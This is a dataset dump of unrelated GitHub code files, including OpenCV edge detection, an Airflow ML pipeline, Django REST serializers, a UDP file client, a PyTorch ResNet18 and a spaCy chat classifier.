+{"seq_id":"933276943","text":"import numpy as np\nimport cv2\n\nimage = cv2.imread(\"images/dog.jpg\", cv2.IMREAD_GRAYSCALE)\nif image is None:\n raise Exception(\"영상파일 읽기 오류\")\n\n\n# SoG 연산\ngaus = cv2.GaussianBlur(image, (7, 7), 0, 0) # 가우스마스크 적용\ndst1 = cv2.Laplacian(gaus, cv2.CV_16S, 7) # 라플라시안 수행\n\n# DoG 연산\ngaus1 = cv2.GaussianBlur(image, (3, 3), 0)\ngaus2 = cv2.GaussianBlur(image, (9, 9), 0)\ndst2 = gaus1 - gaus2\n\ncv2.imshow(\"image\", image)\ncv2.imshow(\"dst1- LoG\", dst1.astype('uint8'))\ncv2.imshow(\"dst2- DoG\", dst2)\ncv2.waitKey(0)\n","repo_name":"yujongyeop/image-processing","sub_path":"week07/edge_DOG.py","file_name":"edge_DOG.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31916048729","text":"# 九章的python代码,这里体现了python中栈操作的便利性。\n# http://www.jiuzhang.com/solutions/binary-tree-zigzag-level-order-traversal/\nfrom lintcode import TreeNode\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: A list of list of integer include \n the zig zag level order traversal of its nodes' values\n \"\"\"\n def preorder(self, root, level, res):\n if root:\n if len(res) < level+1: res.append([])\n if level % 2 == 0: \n res[level].append(root.val)\n else: \n res[level].insert(0, root.val)\n self.preorder(root.left, level+1, res)\n self.preorder(root.right, level+1, res)\n def zigzagLevelOrder(self, root):\n self.results = []\n self.preorder(root, 0, self.results)\n return self.results","repo_name":"XingxingHuang/Leetcode-for-Fun","sub_path":"lintcode/lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_name":"lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"}
+{"seq_id":"86642291565","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python import PythonOperator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\n\n\ndef _prepare_dataset():\n dataset = pd.read_csv('~/airflow-docker/downloads/dataset_diabetes/diabetic_data.csv')\n dataset = dataset.drop(['encounter_id', 'patient_nbr'], axis=1)\n dataset = dataset.replace(to_replace='?', value=np.NaN)\n dataset = dataset.dropna(axis=1)\n dataset = _labels_to_numbers(dataset, 'readmitted')\n dataset = pd.get_dummies(dataset, drop_first=True)\n dataset = _balance_dataset(dataset, 'readmitted')\n dataset.to_csv('~/airflow-docker/downloads/clean_dataset.csv', index=False)\n\ndef _labels_to_numbers(dataset, column):\n labels = dataset[column].unique()\n num_labels = len(labels)\n label_dict = dict(zip(labels, range(0, num_labels)))\n numerical_labels = dataset[column].map(label_dict)\n return dataset.assign(**{column: numerical_labels})\n\ndef _balance_dataset(dataset, target_column):\n value_counts = dataset[target_column].value_counts()\n min_count = min(value_counts)\n return dataset.groupby(target_column).sample(n=min_count, random_state=42)\n\ndef _get_model_score(filepath, target_column, model):\n X, y = _split_dataset(filepath, target_column)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n return f1_score(y_test, y_pred, average='macro')\n\ndef _split_dataset(filepath, target_column):\n dataset = pd.read_csv(filepath)\n X = dataset.drop(target_column, axis=1)\n y = dataset[target_column]\n return X, y\n\ndef _train_best_model(ti, filepath, target_column):\n scores = ti.xcom_pull(task_ids=[\n 'get_svc_score',\n 'get_knn_score',\n 'get_rfc_score'\n ])\n\n model, model_name = _select_best_model(scores)\n X, y = _split_dataset(filepath, target_column)\n model.fit(X, y)\n with open(f'/home/joshua/airflow-docker/downloads/{model_name}_model.pk', 'wb') as f:\n pickle.dump(model, f)\n \n return max(scores)\n\ndef _select_best_model(scores):\n best_model = np.argmax(np.array(scores))\n if best_model == 0:\n return SVC(), 'svc'\n elif best_model == 1:\n return KNeighborsClassifier(), 'knn'\n else:\n return RandomForestClassifier(), 'rfc'\n\n\nwith DAG(\n dag_id='ml_pipeline',\n schedule_interval='@monthly',\n start_date=datetime(2022, 1, 1),\n catchup=False\n) as dag:\n\n download_dataset = BashOperator(\n task_id='download_dataset',\n bash_command='curl -o ~/airflow-docker/downloads/dataset_diabetes.zip https://archive.ics.uci.edu/ml/machine-learning-databases/00296/dataset_diabetes.zip'\n )\n\n unzip_dataset = BashOperator(\n task_id='unzip_dataset',\n bash_command='unzip ~/airflow-docker/downloads/dataset_diabetes.zip -d ~/airflow-docker/downloads/'\n )\n\n prepare_dataset = PythonOperator(\n task_id='prepare_dataset',\n python_callable=_prepare_dataset\n )\n\n get_svc_score = PythonOperator(\n task_id='get_svc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': SVC()}\n )\n\n get_knn_score = PythonOperator(\n task_id='get_knn_score',\n python_callable=_get_model_score,\n 
op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': KNeighborsClassifier()}\n )\n\n get_rfc_score = PythonOperator(\n task_id='get_rfc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': RandomForestClassifier()}\n )\n\n train_best_model = PythonOperator(\n task_id='train_best_model',\n python_callable=_train_best_model,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted'\n }\n )\n\n download_dataset >> unzip_dataset >> prepare_dataset >> [get_svc_score, get_knn_score, get_rfc_score] >> train_best_model\n ","repo_name":"chiny-jc/airflow-workflows","sub_path":"ml_pipeline.py","file_name":"ml_pipeline.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10535767251","text":"################\n# közelítős animáció kép pacával\n\nimport random\nimport pygame as pg\nimport numpy as np\n\nrandom.seed()\n\nWIDTH, HEIGHT = 1550, 800\n\nWIN = pg.display.set_mode((WIDTH, HEIGHT))\n\nBACKGROUND = (128, 220, 12)\n\nFPS = 50\n\nx, y, x1, y1 = 0, HEIGHT / 2, WIDTH / 2, HEIGHT / 2\nu, v, u1, v1 = 0, 0, 0, 0\ndiff = (x1 - x, y1 - y)\nprint(diff[0], diff[1])\n\n\ndef update(x, y, u, v, x1, y1, u1, v1, phase):\n global diff\n if phase == 1:\n f = np.sqrt(diff[0] ** 2 + diff[1] ** 2)\n if f > 30:\n x += u\n y += v\n else:\n phase = 2\n if phase == 2:\n u, v = v, -u\n x += u\n y += v\n u, v = np.co * u - np.si * v, np.si * u, np.co * v\n return x, y, u, v, x1, y1, u1, v1\n\ndef draw_window(x, y, u, v, x1, y1, u1, v1, phase):\n WIN.fill(BACKGROUND)\n x, y, u, v, x1, y1, u1, v1 = update(x, y, u, v, x1, y1, u1, v1, phase)\n pg.draw.rect(WIN, (255, 255, 0), ((RADIUS, RADIUS), (WIDTH - 2 * RADIUS, HEIGHT - 2 * RADIUS)), width=0)\n pg.draw.circle(WIN, (0, 0, 0), (x, y), width=0, radius=20)\n pg.draw.circle(WIN, (0, 0, 255), (x1, y1), width=0, radius=20)\n pg.display.update()\n return x, y, u, v, x1, y1, u1, v1\n\n\ndef main():\n clock = pg.time.Clock()\n run = True\n phase = 1\n f = np.sqrt(diff[0] ** 2 + diff[1] ** 2)\n len = 5\n alpha = np.pi / 20\n si = np.sin(alpha)\n co = np.cos(alpha)\n u = 5 * diff[0] / f\n v = 0 * diff[1] / f\n\n while run:\n clock.tick(FPS)\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n x, y, u, v, x1, y1, u1, v1 = draw_window(x, y, u, v, x1, y1, u1, v1, phase)\n pg.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"egyszem/emotion_through_motions","sub_path":"test6.py","file_name":"test6.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"24424431101","text":"# Actualizado por:\n# Yeimmy Katherin Lugo \n# 07/06/2023\n\n\nfrom rest_framework import serializers\nfrom .models import Devices, Project, Template, DatosSensores, SharedProject, graphics\n\n\n\n# class SharedProjectValidationSerializer(serializers.Serializer):\n# idrandom = serializers.CharField()\n\n# def validate_idrandom(self, value):\n# try:\n# project = Project.objects.get(idrandom=value)\n# except Project.DoesNotExist:\n# raise serializers.ValidationError(\"Invalid idrandom\")\n# return value\n\nclass SharedRelationSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True) # Campo de solo lectura para el ID\n\n class Meta:\n model = SharedProject\n fields = ['id', 'user', 'project', 'timestamp']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n\n \nclass ShareProjectSerializer(serializers.Serializer):\n idrandom = serializers.CharField(max_length=300) # Campo de cadena de caracteres con una longitud máxima de 300 caracteres\n # Define el campo \"idrandom\" que se serializará/deserializará\n\n \nclass ProjectSerializer(serializers.ModelSerializer):\n relationUserProject = serializers.ReadOnlyField(source='relationUserProject.username')\n # Define un campo de solo lectura \"relationUserProject\" que obtiene el nombre de usuario del campo \"relationUserProject\" del objeto relacionado\n\n class Meta:\n model = Project\n fields = ['id', 'idrandom', 'name', 'location', 'description', 'relationUserProject']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserProject en el usuario autenticado\n validated_data[\"relationUserProject\"] = user\n # Creamos el objeto Project usando los datos validados actualizados\n project = Project.objects.create(**validated_data)\n return project\n\nclass DevicesSerializer(serializers.ModelSerializer):\n relationProject = serializers.PrimaryKeyRelatedField(queryset=Project.objects.all(), default=serializers.CurrentUserDefault())\n # Utilizamos el campo PrimaryKeyRelatedField para obtener el ID del proyecto en lugar del nombre\n class Meta:\n model = Devices\n # Asocia el serializador al modelo \"Devices\"\n fields = [\n \"id\", # Campo de identificación del dispositivo\n \"name\", # Campo de nombre del dispositivo\n \"location\",# Campo de ubicación del dispositivo\n \"template\",\n \"relationProject\", # Campo de relación con el usuario propietario del dispositivo\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n \n def create(self, validated_data):\n project_id = self.context['request'].parser_context['kwargs']['project_id']\n project = Project.objects.get(id=project_id)\n validated_data.pop('relationProject')\n device = Devices.objects.create(relationProject=project, **validated_data)\n return device\n \n \nclass TemplateSerializer(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo 
\"relationUserTemplate\" del objeto relacionado\n\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserDevice en el usuario autenticado\n validated_data[\"relationUserTemplate\"] = user\n # Creamos el objeto relationUserDevice usando los datos validados actualizados\n template = Template.objects.create(**validated_data)\n return template\n \nclass TemplateSerializerShared(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo \"relationUserTemplate\" del objeto relacionado\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n\n \n \n \nclass DatosSensoresSerializer(serializers.ModelSerializer):\n relationTemplatePin = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = DatosSensores\n fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n read_only_fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n \n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplatePin') # Eliminar la clave 'relationTemplateGraphics'\n sensores = DatosSensores.objects.create(relationTemplatePin=template, **validated_data)\n return sensores\n\nclass GraphicsSerializer(serializers.ModelSerializer):\n relationTemplateGraphics = serializers.PrimaryKeyRelatedField(queryset=Template.objects.all(), default=serializers.CurrentUserDefault())\n\n class Meta:\n model = graphics\n fields = [\n \"id\",\n \"titlegraphics\",\n \"namegraphics\",\n \"aliasgraphics\",\n \"location\",\n \"is_circular\",\n \"color\",\n \"ports\",\n \"size_increase\", \n \"size_decrease\",\n \"relationTemplateGraphics\",\n ]\n read_only_fields = ['id']\n\n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplateGraphics') # Eliminar la clave 'relationTemplateGraphics'\n 
graphicsx = graphics.objects.create(relationTemplateGraphics=template, **validated_data)\n return graphicsx\n\n\n","repo_name":"PIANTAIOT/Pianta---IOT---Backend-","sub_path":"Pianta/Project_Api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6402881010","text":"import socket\nimport os\nimport sys\n\n\n#function that asks the user for what it wants to do and returns an integer.\n#It returns the command if a valid command if a valid command has been\n#requested, otherwise it returns 0.\ndef inputReceiver():\n print(\"1) get the list of file in the server\")\n print(\"2) get the contents of a file from the server\")\n print(\"3) upload a file on the server\")\n print(\"4) exit\")\n command = input(\"Input a valid command[1/2/3/4]: \")\n if(command.isnumeric()):\n command = int(command)\n if command == 1 or command == 2 or command == 3 or command == 4:\n return command\n else:\n return 0\n else :\n return 0\n\n\n#initialize socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n#set server address\nserver_address = (\"localhost\", 12000)\n\n#starting main continious loop, which controlls the UPD communications with the server\nwhile True:\n\n #waitingForCommand will be used to ask the user for a valid command until one is entered\n waitingForCommand = True\n\n #while loop askd for user to input a valid command until it is entered\n while waitingForCommand:\n commandRequested = int(inputReceiver())\n \n if commandRequested != 0:\n print(\"command accepted\")\n waitingForCommand = False\n else :\n print(\"command not acceptable\")\n\n #incapsulating in a try to catch any exeptions\n try:\n \n if commandRequested == 1:\n\n #sending the request of the list message to the server\n message = \"get list\"\n sock.sendto(message.encode(), server_address)\n\n #receiving the list from the server. the first word is the number of files in the list, then the filenames are listed\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #checking if the server sent a valid answer\n if data.isdigit():\n\n #printing the number of files\n print(\"there are \" + str(data) + \" files on the server\")\n\n #waiting for server to send the list of files\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #printing the filenames\n print(str(data))\n\n #printing the error message of the server, if the awnswer wasn't valid\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n elif commandRequested == 2:\n\n #requesting the filename of the file the user wants to download\n fileName = input(\"input the name of the file you want to download: \")\n\n #sending the request of the file to the server\n message = \"get file\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n\n #receiving the request flag\n #if the flag is 0 then the file has been found\n data, server = sock.recvfrom(4096)\n data = data.decode()\n \n if data == \"0\":\n\n #downloading the file on the client\n print(\"file found on the server\\ndownloading the file...\")\n\n #receiving the file contents from the server\n data, server = sock.recvfrom(4096)\n data = data.decode()\n #creating a new file with as name the fileName and writing the contents\n fileFolder = os.path.join(os.getcwd(),\"client_files\")\n filePath = os.path.join(fileFolder,fileName)\n newFile = open(filePath, \"w\")\n newFile.write(data)\n print(\"file downloaded\")\n\n #if the flag is 1 then the file has not been found\n elif data == \"1\":\n print(\"the file has not been found on the server\")\n\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n elif commandRequested == 3:\n\n #requesting the filename of the file the user wants to upload\n fileName = input(\"input the name of the file you 
want to upload: \")\n\n #reading the file\n fileFolder = os.path.join(os.getcwd(), \"client_files\")\n filePath = os.path.join(fileFolder, fileName)\n file = open(filePath, \"r+\")\n data = file.read()\n\n #sending the request, filename and file contents to the server\n message = \"upload\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n sock.sendto(data.encode(), server_address)\n file.close()\n\n print(\"sending \" + fileName + \" to the server...\")\n\n #waiting for the server to awnser, telling the client the file has been uploaded\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #if the request flag is == \"0\" the file has been correctly uploaded\n if data == \"0\":\n print(fileName + \" uploaded correctly to the server\")\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n #closing the client program\n elif commandRequested == 4:\n sock.close()\n sys.exit()\n\n except Exception as e:\n print(e)\n \n print(\"\\n\\n\\n\\n\")\n","repo_name":"Oldranda1414/ProgettoReti","sub_path":"src/client/UDPClient.py","file_name":"UDPClient.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11890456709","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/11 16:34\n# @Author : zyf\n# @File : ResNet_18.py\n# @Software: PyCharm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\n\n'''\n CNN经典网络结构复现:LeNet5、AlexNet、VGG、ResNet、InceptionNet等\n ResNet18网络结构:18 = 1(conv1) + 2*2(第一个残差部分) +2*2(第二个残差部分) +2*2(第三个残差部分) +2*2(第四个残差部分) + 1(FC)\n 需要设计一个残差块,ResBlock设计:\n 包含两个卷积层,每个卷积层后面跟一个归一化\n kernel_size = 3 卷积核大小\n stride不固定,目的是为了降采样,保证残差的维度与真正输出的维度一致\n\n 第一部分卷积conv1:\n 输入:224*224*3\n 输出:112*112*64\n conv:kernel_size = 7*7 stride=2 padding=3\n \n 输入:112*112*64\n 输出:56*56*64\n max pooling : kernel_size =3 stride=2 padding=1\n \n 第一个残差部分conv2:\n 输入:56*56*64 输出:56*56*64\n 包含两个残差块,每个残差块里面有两个卷积层\n \n 第二个残差部分conv2:\n 输入:56*56*64 输出:28*28*128\n 包含两个残差块,每个残差块里面有两个卷积层,\n 其中第一个残差块要做下采样\n 第三个残差部分conv2:\n 输入:28*28*128 输出:14*14*256\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 第四个残差部分conv2:\n 输入:14*14*256 输出:7*7*512\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 自定义池化和全连接层\n avg_pool\n fc \n \n 注意:其实这部分的残差块与ResNet18的结构是一样的,不过是每个残差部分的数量不一致罢了,这里分开实现纯粹是为了代码熟练度。\n ResNet18 18= 1 + 2*2 + 2*2 +2*2 +2*2 + 1\n ResNet34 34= 1 + 2*3 + 2*4 +2*6 +2*3 + 1 \n'''\n\n\n# 设计18和34残差块,ResNet18和ResNet34 用的3*3的卷积,而且每个残差块都只有两层卷积\nclass ResBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_channel, out_channel, stride=1):\n super(ResBlock, self).__init__()\n # 残差块内的第一个卷积,当stride!=1时,要进行下采样downsample\n # 例如56*56*64 -> 28*28*128 的时候要进行downsample,这时候要stride=2\n self.conv1 = nn.Conv2d(in_channels=in_channel, out_channels=out_channel, kernel_size=3, stride=stride,\n padding=1)\n # 卷积后跟的bn层\n self.bn1 = nn.BatchNorm2d(out_channel)\n # 激活函数ReLu\n self.relu = nn.ReLU(inplace=True)\n # 残差块内的第二个卷积,k=3,s=1,p=1,这个卷积层没什么变化,in_channels和out_channels 是一样的\n self.conv2 = nn.Conv2d(in_channels=out_channel, out_channels=out_channel, kernel_size=3, stride=1, padding=1)\n # 第二个bn层\n self.bn2 = nn.BatchNorm2d(out_channel)\n\n # 快捷连接设计,也就是右边x的部分,在做残差相加的时候,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n self.shortcut = None\n print(in_channel, out_channel, stride)\n # 重点部分,当残差块要进行downsample的时候,快捷连接也需要进行维度的同步,\n # 同步的方法是采用一个1*1的卷积,同时stride=2\n if stride != 1 or in_channel != out_channel:\n self.shortcut = nn.Sequential(\n # 采用1*1的卷积进行维度同步 。下采��,W*H会变小 。\n nn.Conv2d(in_channel, out_channel, kernel_size=1, stride=stride),\n nn.BatchNorm2d(out_channel)\n )\n\n # 前向传播\n def forward(self, x):\n # 残差块的右边x\n identity = x\n # 残差块计算流程\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n # 快捷连接计算的结果\n if self.shortcut is not None:\n identity = self.shortcut(x)\n # 两个结果相加\n out += identity\n out = self.relu(out)\n return out\n\n\n# 设计ResNet网络结构\nclass ResNet(nn.Module):\n def __init__(self, nums=1000):\n super(ResNet, self).__init__()\n # 分类数\n self.nums = nums\n # 第一部分卷积conv1 输入:224*224*3\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n )\n # 第一个残差部分,包含两个残差块,由于没有涉及残差维度变化,两个残差块都是一样的\n self.conv2 = nn.Sequential(\n ResBlock(in_channel=64, out_channel=64),\n ResBlock(in_channel=64, out_channel=64)\n )\n # 第二个残差部分,包含两个残差块,四个卷积层\n self.conv3 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=64, out_channel=128, stride=2),\n ResBlock(in_channel=128, out_channel=128)\n )\n # 第三个残差部分,包含两个残差块,四个卷积层\n self.conv4 = nn.Sequential(\n # 
第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=128, out_channel=256, stride=2),\n ResBlock(in_channel=256, out_channel=256)\n )\n # 第四个残差部分,包含两个残差块,四个卷积层\n self.conv5 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=256, out_channel=512, stride=2),\n ResBlock(in_channel=512, out_channel=512)\n )\n # 自定义池化层,用来固定输出的size大小\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n # 定义全连接层,输出是类别数\n self.fc = nn.Linear(512, self.nums)\n\n # 前向传播\n def forward(self, x):\n # 卷积层\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n # 自定义池化,固定输出大小\n x = self.avg_pool(x)\n # 将特征向量展开\n x = torch.flatten(x, 1)\n # 全连接层\n x = self.fc(x)\n return x\n\nx = torch.rand((2,3,224,224))\nres = ResNet()\nprint(res)\nout = res(x)\nprint(out)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nres = res.to(device)\nsummary(res, (3, 224, 224))\n","repo_name":"zyf-xtu/pytorch_models","sub_path":"cnn_models/ResNet_18.py","file_name":"ResNet_18.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"zh","doc_type":"code","stars":60,"dataset":"github-code","pt":"18"}
+{"seq_id":"35752499755","text":"import logging\nimport os\nimport unittest\nimport pandas as pd\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom helper import *\nfrom l2_orderbook_tops import l2_orderbook_tops\n\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n\n\nclass TestWatch(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super(TestWatch, self).__init__(*args, **kwargs)\n\n def test_bid_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 50.05, 0.02, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 45.05, 0.02, 1)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-2], 30)\n\n def test_ask_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 149.00, 0.02, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 151.00, 0.02, 0)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-1], 30)\n","repo_name":"Tiergarten/l2-orderbook-tops","sub_path":"tests/test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"39976327158","text":"import json\nimport re\nimport spacy\nimport numpy as np\nfrom autocorrect import spell\nfrom copy import deepcopy\nfrom os import path\nfrom os.path import basename\n\n# the ioid of this script for JSON payload 'from'\nioid = basename(__file__) # 'hello.py'\n# Load the spacy english model\nnlp = spacy.load('en')\n\nCONVO_CLASSES_PATH = path.join(\n path.dirname(__file__), '..', '..', 'data', 'convo_classes.json')\nCONVO_CLASSES = json.load(open(CONVO_CLASSES_PATH))\n\nMIN_SIM_THRESHOLD = 0.7\n\n\ndef vectorize_queries(convo_classes):\n for topic in convo_classes:\n topic_convo = convo_classes[topic]\n topic_convo['queries_wordvecs'] = []\n for q in topic_convo['queries']:\n q_vector = nlp(q)\n topic_convo['queries_wordvecs'].append(q_vector)\n return convo_classes\n\nvectorize_queries(CONVO_CLASSES)\n\n\n# helper to clean all text before operation\ndef clean_input(text):\n # first clean out symbols\n text = re.sub(r'[^\\w]', ' ', text)\n # then tokenize\n text = text.split()\n # then correct all spellings\n text = map(spell, text)\n text = \" \".join(text)\n return text\n\n\n# classify a conversation (topic) using wordvec\n# return a convo copy,\n# i.e. an object in convo_classes\ndef wordvec_classify(input_str):\n input_str = clean_input(input_str)\n input_v = nlp(input_str)\n high_score = 0\n high_topic = 'exception'\n org_convo = CONVO_CLASSES['exception'] # default\n for topic in CONVO_CLASSES:\n topic_convo = CONVO_CLASSES[topic]\n local_high_score = max([\n input_v.similarity(q_v) for q_v in topic_convo['queries_wordvecs']\n ]) if topic_convo['queries_wordvecs'] else 0\n if (local_high_score > high_score and\n local_high_score > MIN_SIM_THRESHOLD):\n high_score = local_high_score\n high_topic = topic\n org_convo = topic_convo\n convo = deepcopy(org_convo)\n convo['score'] = high_score\n convo['topic'] = high_topic\n return convo\n\n\ndef compose_response(convo):\n options = convo['responses']\n response = np.random.choice(options)\n return {\n 'score': convo['score'],\n 'topic': convo['topic'],\n 'response': response\n }\n\n\n# basic way to classify convo topic\n# then reply by predefined responses in data/convo_classes.json\ndef classify_convo(input_str):\n convo = wordvec_classify(input_str)\n response_payload = compose_response(convo)\n return response_payload\n\n\n# module method for socketIO\ndef classify(msg):\n # the reply JSON payload.\n reply = {\n 'output': classify_convo(msg.get('input')),\n 'to': msg.get('from'),\n 'from': ioid,\n 'hash': msg.get('hash')\n }\n # the py client will send this to target \n return reply\n","repo_name":"kengz/aiva","sub_path":"lib/py/convo_classifier.py","file_name":"convo_classifier.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":808,"dataset":"github-code","pt":"18"}
